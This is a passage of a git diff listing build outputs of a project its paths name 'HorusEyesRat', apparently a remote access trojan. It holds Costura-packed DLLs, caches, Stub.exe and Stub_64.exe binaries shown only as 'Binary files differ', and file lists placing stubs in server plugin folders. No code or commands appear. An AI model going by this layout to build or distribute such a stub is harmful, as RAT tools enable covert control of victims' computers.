b/Client/obj/Release/Costura/A05582867BB3F404D10079DC01AB52CA18915C4B.costura.options.dll.compressed differ diff --git a/Client/obj/Release/Costura/A3C854D55F99E7F58315D98B75A6646375F1842A.costura.options.pdb.compressed b/Client/obj/Release/Costura/A3C854D55F99E7F58315D98B75A6646375F1842A.costura.options.pdb.compressed new file mode 100644 index 0000000..02f4ea8 Binary files /dev/null and b/Client/obj/Release/Costura/A3C854D55F99E7F58315D98B75A6646375F1842A.costura.options.pdb.compressed differ diff --git a/Client/obj/Release/Costura/A728FD074EDE8F9FA3082FFA4CEC4039BBA691AB.costura.options.dll.compressed b/Client/obj/Release/Costura/A728FD074EDE8F9FA3082FFA4CEC4039BBA691AB.costura.options.dll.compressed new file mode 100644 index 0000000..f2853cb Binary files /dev/null and b/Client/obj/Release/Costura/A728FD074EDE8F9FA3082FFA4CEC4039BBA691AB.costura.options.dll.compressed differ diff --git a/Client/obj/Release/Costura/A8126723344BAF9DBBBD86831D9697C5BD1C216C.costura.options.pdb.compressed b/Client/obj/Release/Costura/A8126723344BAF9DBBBD86831D9697C5BD1C216C.costura.options.pdb.compressed new file mode 100644 index 0000000..153d008 Binary files /dev/null and b/Client/obj/Release/Costura/A8126723344BAF9DBBBD86831D9697C5BD1C216C.costura.options.pdb.compressed differ diff --git a/Client/obj/Release/Costura/A8C367646449C4AFA5066C6E9FE1878182AE5A9F.costura.options.dll.compressed b/Client/obj/Release/Costura/A8C367646449C4AFA5066C6E9FE1878182AE5A9F.costura.options.dll.compressed new file mode 100644 index 0000000..d148304 Binary files /dev/null and b/Client/obj/Release/Costura/A8C367646449C4AFA5066C6E9FE1878182AE5A9F.costura.options.dll.compressed differ diff --git a/Client/obj/Release/Costura/AA06B4562F7677D2E0A4591D88BFBC59740A7C10.costura.options.dll.compressed b/Client/obj/Release/Costura/AA06B4562F7677D2E0A4591D88BFBC59740A7C10.costura.options.dll.compressed new file mode 100644 index 0000000..6789bdf Binary files /dev/null and b/Client/obj/Release/Costura/AA06B4562F7677D2E0A4591D88BFBC59740A7C10.costura.options.dll.compressed differ diff --git a/Client/obj/Release/Costura/ACDB27BA25847646680E2516BDB822314DDD83CD.costura.options.pdb.compressed b/Client/obj/Release/Costura/ACDB27BA25847646680E2516BDB822314DDD83CD.costura.options.pdb.compressed new file mode 100644 index 0000000..26aa433 Binary files /dev/null and b/Client/obj/Release/Costura/ACDB27BA25847646680E2516BDB822314DDD83CD.costura.options.pdb.compressed differ diff --git a/Client/obj/Release/Costura/AFD2FA61F725A904C4424BE5B95BDF99005B0E83.costura.testcs.dll.compressed b/Client/obj/Release/Costura/AFD2FA61F725A904C4424BE5B95BDF99005B0E83.costura.testcs.dll.compressed new file mode 100644 index 0000000..d5d98be Binary files /dev/null and b/Client/obj/Release/Costura/AFD2FA61F725A904C4424BE5B95BDF99005B0E83.costura.testcs.dll.compressed differ diff --git a/Client/obj/Release/Costura/B08294E9AB5DD0F4763D6C22032EC22CF80DBFDC.costura.options.dll.compressed b/Client/obj/Release/Costura/B08294E9AB5DD0F4763D6C22032EC22CF80DBFDC.costura.options.dll.compressed new file mode 100644 index 0000000..154700c Binary files /dev/null and b/Client/obj/Release/Costura/B08294E9AB5DD0F4763D6C22032EC22CF80DBFDC.costura.options.dll.compressed differ diff --git a/Client/obj/Release/Costura/B20B1E84E6167CE62E8037BE50A01F9A43F7F796.costura.options.pdb.compressed b/Client/obj/Release/Costura/B20B1E84E6167CE62E8037BE50A01F9A43F7F796.costura.options.pdb.compressed new file mode 100644 index 0000000..ff6a0c6 Binary files /dev/null and b/Client/obj/Release/Costura/B20B1E84E6167CE62E8037BE50A01F9A43F7F796.costura.options.pdb.compressed differ diff --git a/Client/obj/Release/Costura/B7F2D78C125C9BA6CB27D4AF5A59DD05E4EBD08C.costura.options.pdb.compressed b/Client/obj/Release/Costura/B7F2D78C125C9BA6CB27D4AF5A59DD05E4EBD08C.costura.options.pdb.compressed new file mode 100644 index 0000000..7ec6cae Binary files /dev/null and b/Client/obj/Release/Costura/B7F2D78C125C9BA6CB27D4AF5A59DD05E4EBD08C.costura.options.pdb.compressed differ diff --git a/Client/obj/Release/Costura/B88FF490404A24F4AAA5861706BDEC5463C565E5.costura.options.pdb.compressed b/Client/obj/Release/Costura/B88FF490404A24F4AAA5861706BDEC5463C565E5.costura.options.pdb.compressed new file mode 100644 index 0000000..f2b600d Binary files /dev/null and b/Client/obj/Release/Costura/B88FF490404A24F4AAA5861706BDEC5463C565E5.costura.options.pdb.compressed differ diff --git a/Client/obj/Release/Costura/BAB1C3D13C4FC3113B202640220AF2D33A430013.costura.options.pdb.compressed b/Client/obj/Release/Costura/BAB1C3D13C4FC3113B202640220AF2D33A430013.costura.options.pdb.compressed new file mode 100644 index 0000000..08ff0af Binary files /dev/null and b/Client/obj/Release/Costura/BAB1C3D13C4FC3113B202640220AF2D33A430013.costura.options.pdb.compressed differ diff --git a/Client/obj/Release/Costura/BB468F3950DA03F8A2D5600363712D9FD2FE98CD.costura.options.pdb.compressed b/Client/obj/Release/Costura/BB468F3950DA03F8A2D5600363712D9FD2FE98CD.costura.options.pdb.compressed new file mode 100644 index 0000000..50ff448 Binary files /dev/null and b/Client/obj/Release/Costura/BB468F3950DA03F8A2D5600363712D9FD2FE98CD.costura.options.pdb.compressed differ diff --git a/Client/obj/Release/Costura/BBEDC29A6B1DB4E4DC655BF71F2DE0A1ED0EACA5.costura.packetlib.dll.compressed b/Client/obj/Release/Costura/BBEDC29A6B1DB4E4DC655BF71F2DE0A1ED0EACA5.costura.packetlib.dll.compressed new file mode 100644 index 0000000..643f842 Binary files /dev/null and b/Client/obj/Release/Costura/BBEDC29A6B1DB4E4DC655BF71F2DE0A1ED0EACA5.costura.packetlib.dll.compressed differ diff --git a/Client/obj/Release/Costura/BC031A9D3025BC428C1A13185C2272F8D98F4219.costura.options.pdb.compressed b/Client/obj/Release/Costura/BC031A9D3025BC428C1A13185C2272F8D98F4219.costura.options.pdb.compressed new file mode 100644 index 0000000..ac007fd Binary files /dev/null and b/Client/obj/Release/Costura/BC031A9D3025BC428C1A13185C2272F8D98F4219.costura.options.pdb.compressed differ diff --git a/Client/obj/Release/Costura/BC57877556F4EAB551D2A90B622BEC207F3BB510.costura.options.dll.compressed b/Client/obj/Release/Costura/BC57877556F4EAB551D2A90B622BEC207F3BB510.costura.options.dll.compressed new file mode 100644 index 0000000..d9dd5ed Binary files /dev/null and b/Client/obj/Release/Costura/BC57877556F4EAB551D2A90B622BEC207F3BB510.costura.options.dll.compressed differ diff --git a/Client/obj/Release/Costura/C18402E3DED3B4CA4FD07E9F6B787C2160EACD45.costura.options.dll.compressed b/Client/obj/Release/Costura/C18402E3DED3B4CA4FD07E9F6B787C2160EACD45.costura.options.dll.compressed new file mode 100644 index 0000000..b0c7c21 Binary files /dev/null and b/Client/obj/Release/Costura/C18402E3DED3B4CA4FD07E9F6B787C2160EACD45.costura.options.dll.compressed differ diff --git a/Client/obj/Release/Costura/C2B41FBD61B9C3E4571650324C629B2C173810D4.costura.options.dll.compressed b/Client/obj/Release/Costura/C2B41FBD61B9C3E4571650324C629B2C173810D4.costura.options.dll.compressed new file mode 100644 index 0000000..d9526d7 Binary files /dev/null and b/Client/obj/Release/Costura/C2B41FBD61B9C3E4571650324C629B2C173810D4.costura.options.dll.compressed differ diff --git a/Client/obj/Release/Costura/C3498D8E656289B6144D132E07EF2E2F3B9455C3.costura.testcs.dll.compressed b/Client/obj/Release/Costura/C3498D8E656289B6144D132E07EF2E2F3B9455C3.costura.testcs.dll.compressed new file mode 100644 index 0000000..a5c7e6c Binary files /dev/null and b/Client/obj/Release/Costura/C3498D8E656289B6144D132E07EF2E2F3B9455C3.costura.testcs.dll.compressed differ diff --git a/Client/obj/Release/Costura/C34F5D3151EB7348E43666146A2783DF35DB67B7.costura.options.dll.compressed b/Client/obj/Release/Costura/C34F5D3151EB7348E43666146A2783DF35DB67B7.costura.options.dll.compressed new file mode 100644 index 0000000..3e7c9af Binary files /dev/null and b/Client/obj/Release/Costura/C34F5D3151EB7348E43666146A2783DF35DB67B7.costura.options.dll.compressed differ diff --git a/Client/obj/Release/Costura/C3C2E20DBAE0E6257CEE793706FDA80898EBC3ED.costura.options.pdb.compressed b/Client/obj/Release/Costura/C3C2E20DBAE0E6257CEE793706FDA80898EBC3ED.costura.options.pdb.compressed new file mode 100644 index 0000000..5ce29c1 Binary files /dev/null and b/Client/obj/Release/Costura/C3C2E20DBAE0E6257CEE793706FDA80898EBC3ED.costura.options.pdb.compressed differ diff --git a/Client/obj/Release/Costura/C52D1AE6668216973592CE5314DF1C025AD03E2F.costura.options.dll.compressed b/Client/obj/Release/Costura/C52D1AE6668216973592CE5314DF1C025AD03E2F.costura.options.dll.compressed new file mode 100644 index 0000000..249bcce Binary files /dev/null and b/Client/obj/Release/Costura/C52D1AE6668216973592CE5314DF1C025AD03E2F.costura.options.dll.compressed differ diff --git a/Client/obj/Release/Costura/CC40145DC7F8C44FEEF3CF9DA292B74032FE9F82.costura.options.dll.compressed b/Client/obj/Release/Costura/CC40145DC7F8C44FEEF3CF9DA292B74032FE9F82.costura.options.dll.compressed new file mode 100644 index 0000000..e2fe428 Binary files /dev/null and b/Client/obj/Release/Costura/CC40145DC7F8C44FEEF3CF9DA292B74032FE9F82.costura.options.dll.compressed differ diff --git a/Client/obj/Release/Costura/CCDBBD06ACB8597BB0105A34A75FC321BF98713D.costura.options.dll.compressed b/Client/obj/Release/Costura/CCDBBD06ACB8597BB0105A34A75FC321BF98713D.costura.options.dll.compressed new file mode 100644 index 0000000..035385a Binary files /dev/null and b/Client/obj/Release/Costura/CCDBBD06ACB8597BB0105A34A75FC321BF98713D.costura.options.dll.compressed differ diff --git a/Client/obj/Release/Costura/CD22A9E615456E03A82C4E84E1144BFA948DB6C9.costura.testcs.pdb.compressed b/Client/obj/Release/Costura/CD22A9E615456E03A82C4E84E1144BFA948DB6C9.costura.testcs.pdb.compressed new file mode 100644 index 0000000..c3f47f1 Binary files /dev/null and b/Client/obj/Release/Costura/CD22A9E615456E03A82C4E84E1144BFA948DB6C9.costura.testcs.pdb.compressed differ diff --git a/Client/obj/Release/Costura/CD6906005ADAAB7407932C125DB73699CAE8194A.costura.packetlib.pdb.compressed b/Client/obj/Release/Costura/CD6906005ADAAB7407932C125DB73699CAE8194A.costura.packetlib.pdb.compressed new file mode 100644 index 0000000..02c151f Binary files /dev/null and b/Client/obj/Release/Costura/CD6906005ADAAB7407932C125DB73699CAE8194A.costura.packetlib.pdb.compressed differ diff --git a/Client/obj/Release/Costura/CDA081EB3EBA535146E24D868DB5C9A32AB2BD09.costura.options.pdb.compressed b/Client/obj/Release/Costura/CDA081EB3EBA535146E24D868DB5C9A32AB2BD09.costura.options.pdb.compressed new file mode 100644 index 0000000..36f1b62 Binary files /dev/null and b/Client/obj/Release/Costura/CDA081EB3EBA535146E24D868DB5C9A32AB2BD09.costura.options.pdb.compressed differ diff --git a/Client/obj/Release/Costura/D23FAB8D0B9924A56CFD26F70B5B1DD2584CDDC5.costura.options.pdb.compressed b/Client/obj/Release/Costura/D23FAB8D0B9924A56CFD26F70B5B1DD2584CDDC5.costura.options.pdb.compressed new file mode 100644 index 0000000..dc9f4dc Binary files /dev/null and b/Client/obj/Release/Costura/D23FAB8D0B9924A56CFD26F70B5B1DD2584CDDC5.costura.options.pdb.compressed differ diff --git a/Client/obj/Release/Costura/D2A12EA11056E4663BF2A0B8A2E465D0D6761E18.costura.options.pdb.compressed b/Client/obj/Release/Costura/D2A12EA11056E4663BF2A0B8A2E465D0D6761E18.costura.options.pdb.compressed new file mode 100644 index 0000000..7b631d8 Binary files /dev/null and b/Client/obj/Release/Costura/D2A12EA11056E4663BF2A0B8A2E465D0D6761E18.costura.options.pdb.compressed differ diff --git a/Client/obj/Release/Costura/D49C59EAC7E8F82B6F8F6E04F12168D6426B9148.costura.packetlib.dll.compressed b/Client/obj/Release/Costura/D49C59EAC7E8F82B6F8F6E04F12168D6426B9148.costura.packetlib.dll.compressed new file mode 100644 index 0000000..ef4bd5f Binary files /dev/null and b/Client/obj/Release/Costura/D49C59EAC7E8F82B6F8F6E04F12168D6426B9148.costura.packetlib.dll.compressed differ diff --git a/Client/obj/Release/Costura/D746DF271DB776D368A4A599F8FABCE1A89C5D35.costura.options.pdb.compressed b/Client/obj/Release/Costura/D746DF271DB776D368A4A599F8FABCE1A89C5D35.costura.options.pdb.compressed new file mode 100644 index 0000000..8397e5b Binary files /dev/null and b/Client/obj/Release/Costura/D746DF271DB776D368A4A599F8FABCE1A89C5D35.costura.options.pdb.compressed differ diff --git a/Client/obj/Release/Costura/D99B6F4AC6A0E271A44CB1D20C65ACA5C6657B66.costura.options.dll.compressed b/Client/obj/Release/Costura/D99B6F4AC6A0E271A44CB1D20C65ACA5C6657B66.costura.options.dll.compressed new file mode 100644 index 0000000..a3cc6d9 Binary files /dev/null and b/Client/obj/Release/Costura/D99B6F4AC6A0E271A44CB1D20C65ACA5C6657B66.costura.options.dll.compressed differ diff --git a/Client/obj/Release/Costura/D99F71A43762B4671F7F108FC9A3E7E3A9ECC418.costura.options.dll.compressed b/Client/obj/Release/Costura/D99F71A43762B4671F7F108FC9A3E7E3A9ECC418.costura.options.dll.compressed new file mode 100644 index 0000000..a225127 Binary files /dev/null and b/Client/obj/Release/Costura/D99F71A43762B4671F7F108FC9A3E7E3A9ECC418.costura.options.dll.compressed differ diff --git a/Client/obj/Release/Costura/DC2AD847582077B997173BBAEA5F212C67B26BC7.costura.options.pdb.compressed b/Client/obj/Release/Costura/DC2AD847582077B997173BBAEA5F212C67B26BC7.costura.options.pdb.compressed new file mode 100644 index 0000000..cc5c11e Binary files /dev/null and b/Client/obj/Release/Costura/DC2AD847582077B997173BBAEA5F212C67B26BC7.costura.options.pdb.compressed differ diff --git a/Client/obj/Release/Costura/DC3FBA4EE0E61DA1C17821CBD7A297537FB9CAB6.costura.options.dll.compressed b/Client/obj/Release/Costura/DC3FBA4EE0E61DA1C17821CBD7A297537FB9CAB6.costura.options.dll.compressed new file mode 100644 index 0000000..83928b8 Binary files /dev/null and b/Client/obj/Release/Costura/DC3FBA4EE0E61DA1C17821CBD7A297537FB9CAB6.costura.options.dll.compressed differ diff --git a/Client/obj/Release/Costura/DCBC0D6860F5FBB83053697F7A65AA4282F7F78D.costura.options.dll.compressed b/Client/obj/Release/Costura/DCBC0D6860F5FBB83053697F7A65AA4282F7F78D.costura.options.dll.compressed new file mode 100644 index 0000000..0af61db Binary files /dev/null and b/Client/obj/Release/Costura/DCBC0D6860F5FBB83053697F7A65AA4282F7F78D.costura.options.dll.compressed differ diff --git a/Client/obj/Release/Costura/DD26D82DAA2184EF3A2C16108C3CFCCEC0070FC7.costura.testcs.pdb.compressed b/Client/obj/Release/Costura/DD26D82DAA2184EF3A2C16108C3CFCCEC0070FC7.costura.testcs.pdb.compressed new file mode 100644 index 0000000..68e151c Binary files /dev/null and b/Client/obj/Release/Costura/DD26D82DAA2184EF3A2C16108C3CFCCEC0070FC7.costura.testcs.pdb.compressed differ diff --git a/Client/obj/Release/Costura/E23EE9BD832BC8AC0F4C90E8499103865357B92F.costura.options.pdb.compressed b/Client/obj/Release/Costura/E23EE9BD832BC8AC0F4C90E8499103865357B92F.costura.options.pdb.compressed new file mode 100644 index 0000000..4b8dd7e Binary files /dev/null and b/Client/obj/Release/Costura/E23EE9BD832BC8AC0F4C90E8499103865357B92F.costura.options.pdb.compressed differ diff --git a/Client/obj/Release/Costura/E45ACC7F58267EA7F7E25220E72B59F418DE2364.costura.options.pdb.compressed b/Client/obj/Release/Costura/E45ACC7F58267EA7F7E25220E72B59F418DE2364.costura.options.pdb.compressed new file mode 100644 index 0000000..021a636 Binary files /dev/null and b/Client/obj/Release/Costura/E45ACC7F58267EA7F7E25220E72B59F418DE2364.costura.options.pdb.compressed differ diff --git a/Client/obj/Release/Costura/E69BC8D51305AB36A56A68CE11AA39BF37E611C0.costura.options.pdb.compressed b/Client/obj/Release/Costura/E69BC8D51305AB36A56A68CE11AA39BF37E611C0.costura.options.pdb.compressed new file mode 100644 index 0000000..1223a33 Binary files /dev/null and b/Client/obj/Release/Costura/E69BC8D51305AB36A56A68CE11AA39BF37E611C0.costura.options.pdb.compressed differ diff --git a/Client/obj/Release/Costura/EF7A14D5C89C0296F01FF7FE63E5CF1B30DB1E04.costura.packetlib.dll.compressed b/Client/obj/Release/Costura/EF7A14D5C89C0296F01FF7FE63E5CF1B30DB1E04.costura.packetlib.dll.compressed new file mode 100644 index 0000000..c389ee1 Binary files /dev/null and b/Client/obj/Release/Costura/EF7A14D5C89C0296F01FF7FE63E5CF1B30DB1E04.costura.packetlib.dll.compressed differ diff --git a/Client/obj/Release/Costura/F3DC9FAFE49A7E715895548E9E777BE73AC54A4B.costura.options.pdb.compressed b/Client/obj/Release/Costura/F3DC9FAFE49A7E715895548E9E777BE73AC54A4B.costura.options.pdb.compressed new file mode 100644 index 0000000..76b3390 Binary files /dev/null and b/Client/obj/Release/Costura/F3DC9FAFE49A7E715895548E9E777BE73AC54A4B.costura.options.pdb.compressed differ diff --git a/Client/obj/Release/Costura/F6D14F8A8520B791A2F7F6439AC57AD2F3AEA30B.costura.options.dll.compressed b/Client/obj/Release/Costura/F6D14F8A8520B791A2F7F6439AC57AD2F3AEA30B.costura.options.dll.compressed new file mode 100644 index 0000000..42f6ee9 Binary files /dev/null and b/Client/obj/Release/Costura/F6D14F8A8520B791A2F7F6439AC57AD2F3AEA30B.costura.options.dll.compressed differ diff --git a/Client/obj/Release/Costura/F8F2A5D7BC0D68C0E4C2673ADF0BAFDC06D9DBF8.costura.options.pdb.compressed b/Client/obj/Release/Costura/F8F2A5D7BC0D68C0E4C2673ADF0BAFDC06D9DBF8.costura.options.pdb.compressed new file mode 100644 index 0000000..4f9f11f Binary files /dev/null and b/Client/obj/Release/Costura/F8F2A5D7BC0D68C0E4C2673ADF0BAFDC06D9DBF8.costura.options.pdb.compressed differ diff --git a/Client/obj/Release/Costura/FAC95481536500A209B5A9332612768BAE284C98.costura.options.pdb.compressed b/Client/obj/Release/Costura/FAC95481536500A209B5A9332612768BAE284C98.costura.options.pdb.compressed new file mode 100644 index 0000000..50daa03 Binary files /dev/null and b/Client/obj/Release/Costura/FAC95481536500A209B5A9332612768BAE284C98.costura.options.pdb.compressed differ diff --git a/Client/obj/Release/Costura/FD58CA837A5497C93D65BD7B27D1B8B4504DCEB6.costura.options.pdb.compressed b/Client/obj/Release/Costura/FD58CA837A5497C93D65BD7B27D1B8B4504DCEB6.costura.options.pdb.compressed new file mode 100644 index 0000000..2a2cae3 Binary files /dev/null and b/Client/obj/Release/Costura/FD58CA837A5497C93D65BD7B27D1B8B4504DCEB6.costura.options.pdb.compressed differ diff --git a/Client/obj/Release/Costura/FDC21CC2AE5D91CAAE48B45BD3643DB945A51F8A.costura.options.dll.compressed b/Client/obj/Release/Costura/FDC21CC2AE5D91CAAE48B45BD3643DB945A51F8A.costura.options.dll.compressed new file mode 100644 index 0000000..444afc4 Binary files /dev/null and b/Client/obj/Release/Costura/FDC21CC2AE5D91CAAE48B45BD3643DB945A51F8A.costura.options.dll.compressed differ diff --git a/Client/obj/Release/Costura/FEDC3B6E505E077E06053DDAAED6B43FB7B2A5A7.costura.packetlib.pdb.compressed b/Client/obj/Release/Costura/FEDC3B6E505E077E06053DDAAED6B43FB7B2A5A7.costura.packetlib.pdb.compressed new file mode 100644 index 0000000..e91ead0 Binary files /dev/null and b/Client/obj/Release/Costura/FEDC3B6E505E077E06053DDAAED6B43FB7B2A5A7.costura.packetlib.pdb.compressed differ diff --git a/Client/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache b/Client/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache new file mode 100644 index 0000000..a7fc704 Binary files /dev/null and b/Client/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache differ diff --git a/Client/obj/Release/Stub.exe b/Client/obj/Release/Stub.exe new file mode 100644 index 0000000..ad74315 Binary files /dev/null and b/Client/obj/Release/Stub.exe differ diff --git a/Client/obj/Release/Stub.pdb b/Client/obj/Release/Stub.pdb new file mode 100644 index 0000000..6157405 Binary files /dev/null and b/Client/obj/Release/Stub.pdb differ diff --git a/Client/obj/x64/Debug/Client.vbproj.CoreCompileInputs.cache b/Client/obj/x64/Debug/Client.vbproj.CoreCompileInputs.cache index 027d135..ac532b5 100644 --- a/Client/obj/x64/Debug/Client.vbproj.CoreCompileInputs.cache +++ b/Client/obj/x64/Debug/Client.vbproj.CoreCompileInputs.cache @@ -1 +1 @@ -abba032ffeca29cab517c6ef9d012464e6b534e5 +2b6e8822a609e52a597535ac8d692566e2120c0a diff --git a/Client/obj/x64/Debug/Client.vbproj.FileListAbsolute.txt b/Client/obj/x64/Debug/Client.vbproj.FileListAbsolute.txt index b9ba8f8..7bd860c 100644 --- a/Client/obj/x64/Debug/Client.vbproj.FileListAbsolute.txt +++ b/Client/obj/x64/Debug/Client.vbproj.FileListAbsolute.txt @@ -8,3 +8,13 @@ C:\Users\mehdi\Documents\HorusEyesRat-main\Client\obj\x64\Debug\Client.vbproj.Fo C:\Users\mehdi\Documents\HorusEyesRat-main\Client\obj\x64\Debug\Client.vbproj.CopyComplete C:\Users\mehdi\Documents\HorusEyesRat-main\Client\obj\x64\Debug\Stub.exe C:\Users\mehdi\Documents\HorusEyesRat-main\Client\obj\x64\Debug\Stub.pdb +Z:\HorusEyesRat-master\Client\obj\x64\Debug\Client.vbprojAssemblyReference.cache +Z:\HorusEyesRat-master\Client\obj\x64\Debug\Client.vbproj.CoreCompileInputs.cache +Z:\HorusEyesRat-master\Client\obj\x64\Debug\Stub.exe +Z:\HorusEyesRat-master\Client\obj\x64\Debug\Stub.pdb +Z:\HorusEyesRat-master\Client\bin\x64\Debug\Stub.exe.config +Z:\HorusEyesRat-master\Client\bin\x64\Debug\Stub.exe +Z:\HorusEyesRat-master\Client\bin\x64\Debug\Stub.pdb +Z:\HorusEyesRat-master\Client\bin\x64\Debug\PacketLib.xml +Z:\HorusEyesRat-master\Client\obj\x64\Debug\Client.vbproj.Fody.CopyLocal.cache +Z:\HorusEyesRat-master\Client\obj\x64\Debug\Client.vbproj.CopyComplete diff --git a/Client/obj/x64/Debug/Client.vbproj.Fody.CopyLocal.cache b/Client/obj/x64/Debug/Client.vbproj.Fody.CopyLocal.cache index 4cbd38b..c1cd591 100644 --- a/Client/obj/x64/Debug/Client.vbproj.Fody.CopyLocal.cache +++ b/Client/obj/x64/Debug/Client.vbproj.Fody.CopyLocal.cache @@ -1 +1 @@ -C:\Users\mehdi\Documents\HorusEyesRat-main\PacketLib\bin\Debug\PacketLib.xml +Z:\HorusEyesRat-master\PacketLib\bin\Debug\PacketLib.xml diff --git a/Client/obj/x64/Debug/Client.vbprojAssemblyReference.cache b/Client/obj/x64/Debug/Client.vbprojAssemblyReference.cache index 251ab60..5c2c9a1 100644 Binary files a/Client/obj/x64/Debug/Client.vbprojAssemblyReference.cache and b/Client/obj/x64/Debug/Client.vbprojAssemblyReference.cache differ diff --git a/Client/obj/x64/Debug/Costura/746C6F9E511F3138300F360DB08C5C10D0785D0F.costura.packetlib.dll.compressed b/Client/obj/x64/Debug/Costura/746C6F9E511F3138300F360DB08C5C10D0785D0F.costura.packetlib.dll.compressed new file mode 100644 index 0000000..60cb1ab Binary files /dev/null and b/Client/obj/x64/Debug/Costura/746C6F9E511F3138300F360DB08C5C10D0785D0F.costura.packetlib.dll.compressed differ diff --git a/Client/obj/x64/Debug/Costura/88E47D90D32A3913E2B9F3259197A5068A93482F.costura.packetlib.pdb.compressed b/Client/obj/x64/Debug/Costura/88E47D90D32A3913E2B9F3259197A5068A93482F.costura.packetlib.pdb.compressed new file mode 100644 index 0000000..650889f Binary files /dev/null and b/Client/obj/x64/Debug/Costura/88E47D90D32A3913E2B9F3259197A5068A93482F.costura.packetlib.pdb.compressed differ diff --git a/Client/obj/x64/Debug/DesignTimeResolveAssemblyReferencesInput.cache b/Client/obj/x64/Debug/DesignTimeResolveAssemblyReferencesInput.cache index 812619f..6316ef1 100644 Binary files a/Client/obj/x64/Debug/DesignTimeResolveAssemblyReferencesInput.cache and b/Client/obj/x64/Debug/DesignTimeResolveAssemblyReferencesInput.cache differ diff --git a/Client/obj/x64/Debug/Stub.exe b/Client/obj/x64/Debug/Stub.exe index a749eaf..9f14192 100644 Binary files a/Client/obj/x64/Debug/Stub.exe and b/Client/obj/x64/Debug/Stub.exe differ diff --git a/Client/obj/x64/Debug/Stub.pdb b/Client/obj/x64/Debug/Stub.pdb index 61bfdc6..899637d 100644 Binary files a/Client/obj/x64/Debug/Stub.pdb and b/Client/obj/x64/Debug/Stub.pdb differ diff --git a/Client/obj/x64/Release/.NETFramework,Version=v4.8.AssemblyAttributes.vb b/Client/obj/x64/Release/.NETFramework,Version=v4.8.AssemblyAttributes.vb new file mode 100644 index 0000000..e7dcac5 --- /dev/null +++ b/Client/obj/x64/Release/.NETFramework,Version=v4.8.AssemblyAttributes.vb @@ -0,0 +1,7 @@ +' + Option Strict Off + Option Explicit On + + Imports System + Imports System.Reflection + diff --git a/Client/obj/x64/Release/Client.vbproj.CoreCompileInputs.cache b/Client/obj/x64/Release/Client.vbproj.CoreCompileInputs.cache new file mode 100644 index 0000000..7fdf261 --- /dev/null +++ b/Client/obj/x64/Release/Client.vbproj.CoreCompileInputs.cache @@ -0,0 +1 @@ +87cd4c74a38430e3e6ded3c8d07bd052586d916d diff --git a/Client/obj/x64/Release/Client.vbproj.FileListAbsolute.txt b/Client/obj/x64/Release/Client.vbproj.FileListAbsolute.txt new file mode 100644 index 0000000..fe36c42 --- /dev/null +++ b/Client/obj/x64/Release/Client.vbproj.FileListAbsolute.txt @@ -0,0 +1,11 @@ +Z:\HorusEyesRat-master\Server\bin\Release\Plugins\Stub_64.exe.config +Z:\HorusEyesRat-master\Server\bin\Release\Plugins\Stub_64.exe +Z:\HorusEyesRat-master\Server\bin\Release\Plugins\Stub_64.pdb +Z:\HorusEyesRat-master\Client\obj\x64\Release\Client.vbprojAssemblyReference.cache +Z:\HorusEyesRat-master\Client\obj\x64\Release\Client.vbproj.CoreCompileInputs.cache +Z:\HorusEyesRat-master\Server\bin\Release\Stubs\Stub_64.exe.config +Z:\HorusEyesRat-master\Server\bin\Release\Stubs\Stub_64.exe +Z:\HorusEyesRat-master\Server\bin\Release\Stubs\Stub_64.pdb +Z:\HorusEyesRat-master\Client\obj\x64\Release\Client.vbproj.Fody.CopyLocal.cache +Z:\HorusEyesRat-master\Client\obj\x64\Release\Stub_64.exe +Z:\HorusEyesRat-master\Client\obj\x64\Release\Stub_64.pdb diff --git a/Client/obj/x64/Release/Client.vbproj.Fody.CopyLocal.cache b/Client/obj/x64/Release/Client.vbproj.Fody.CopyLocal.cache new file mode 100644 index 0000000..e69de29 diff --git a/Client/obj/x64/Release/Client.vbprojAssemblyReference.cache b/Client/obj/x64/Release/Client.vbprojAssemblyReference.cache new file mode 100644 index 0000000..5c2c9a1 Binary files /dev/null and b/Client/obj/x64/Release/Client.vbprojAssemblyReference.cache differ diff --git a/Client/obj/x64/Release/Costura/0B33BFC7CBC94F36EA0907E5C5A704F74ACD97D8.costura.options.pdb.compressed b/Client/obj/x64/Release/Costura/0B33BFC7CBC94F36EA0907E5C5A704F74ACD97D8.costura.options.pdb.compressed new file mode 100644 index 0000000..1b0e825 Binary files /dev/null and b/Client/obj/x64/Release/Costura/0B33BFC7CBC94F36EA0907E5C5A704F74ACD97D8.costura.options.pdb.compressed differ diff --git a/Client/obj/x64/Release/Costura/0C2C3EA558C7FBC4F7F1C59B1FC328DE8F1F757F.costura.options.pdb.compressed b/Client/obj/x64/Release/Costura/0C2C3EA558C7FBC4F7F1C59B1FC328DE8F1F757F.costura.options.pdb.compressed new file mode 100644 index 0000000..feb89f6 Binary files /dev/null and b/Client/obj/x64/Release/Costura/0C2C3EA558C7FBC4F7F1C59B1FC328DE8F1F757F.costura.options.pdb.compressed differ diff --git a/Client/obj/x64/Release/Costura/0F252BBF0103F960EE9970FB44124AAA3F7072AF.costura.options.dll.compressed b/Client/obj/x64/Release/Costura/0F252BBF0103F960EE9970FB44124AAA3F7072AF.costura.options.dll.compressed new file mode 100644 index 0000000..bbf7c79 Binary files /dev/null and b/Client/obj/x64/Release/Costura/0F252BBF0103F960EE9970FB44124AAA3F7072AF.costura.options.dll.compressed differ diff --git a/Client/obj/x64/Release/Costura/128987C7905E98ED024DD924A5E9E79554F52A15.costura.options.pdb.compressed b/Client/obj/x64/Release/Costura/128987C7905E98ED024DD924A5E9E79554F52A15.costura.options.pdb.compressed new file mode 100644 index 0000000..c23658f Binary files /dev/null and b/Client/obj/x64/Release/Costura/128987C7905E98ED024DD924A5E9E79554F52A15.costura.options.pdb.compressed differ diff --git a/Client/obj/x64/Release/Costura/12BCF815869D3E6F76EA9C901D488E300EB45FF1.costura.options.pdb.compressed b/Client/obj/x64/Release/Costura/12BCF815869D3E6F76EA9C901D488E300EB45FF1.costura.options.pdb.compressed new file mode 100644 index 0000000..ddf83ef Binary files /dev/null and b/Client/obj/x64/Release/Costura/12BCF815869D3E6F76EA9C901D488E300EB45FF1.costura.options.pdb.compressed differ diff --git a/Client/obj/x64/Release/Costura/1C883DF287B7BE760BCC057E333F6B81B0A782AD.costura.options.dll.compressed b/Client/obj/x64/Release/Costura/1C883DF287B7BE760BCC057E333F6B81B0A782AD.costura.options.dll.compressed new file mode 100644 index 0000000..98b1975 Binary files /dev/null and b/Client/obj/x64/Release/Costura/1C883DF287B7BE760BCC057E333F6B81B0A782AD.costura.options.dll.compressed differ diff --git 